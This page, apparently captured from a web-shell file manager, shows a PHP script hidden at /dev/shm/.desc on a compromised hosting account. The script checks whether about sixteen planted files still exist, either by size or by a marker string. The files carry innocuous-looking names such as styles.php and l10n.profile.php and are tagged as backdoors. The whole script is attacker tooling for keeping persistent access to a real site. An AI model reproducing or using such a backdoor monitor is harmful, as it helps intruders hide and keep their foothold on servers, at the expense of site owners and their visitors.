Viewing File: /dev/shm/.desc

<?php   $r = '/home/expinsoft/sahilk.expinsoft.com'; $x = ["/param.php"=>"bd@@107454418@@47",
"/img/l10n.profile.php"=>"bd@@107458487@@634",
"/static/users.actions.php"=>"bd@@107462376@@1630",
"/static/css/styles.php"=>"bd@@107485108@@72",
"/.well-known/pl.php"=>"bd@@107486058@@1552",
"/static/js/route_emails.php"=>"bd@@107456937@@1952",
"/static/css/artadd.php"=>"bd@@107505464@@29",
"/manager.php"=>"bd@@107542575@@27",
"/img/l10n.profile.php"=>"bd@@107560415@@app_initializer",
"/pura.php"=>"bd@@107554507@@buffer_cache",
"/static/homepageData.php"=>"bd@@111903116@@20",
"/pura.php"=>"bd@@98910124@@2491",
"/param.php"=>"bd@@98889027@@1125",
"/static/css/styles.php"=>"bd@@107455711@@1575",
"/static/css/down_site.php"=>"ui@@512751@@1904",
"/static/css/announce.inc.php"=>"ui@@529942@@1476"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 
Back to Directory File Manager
<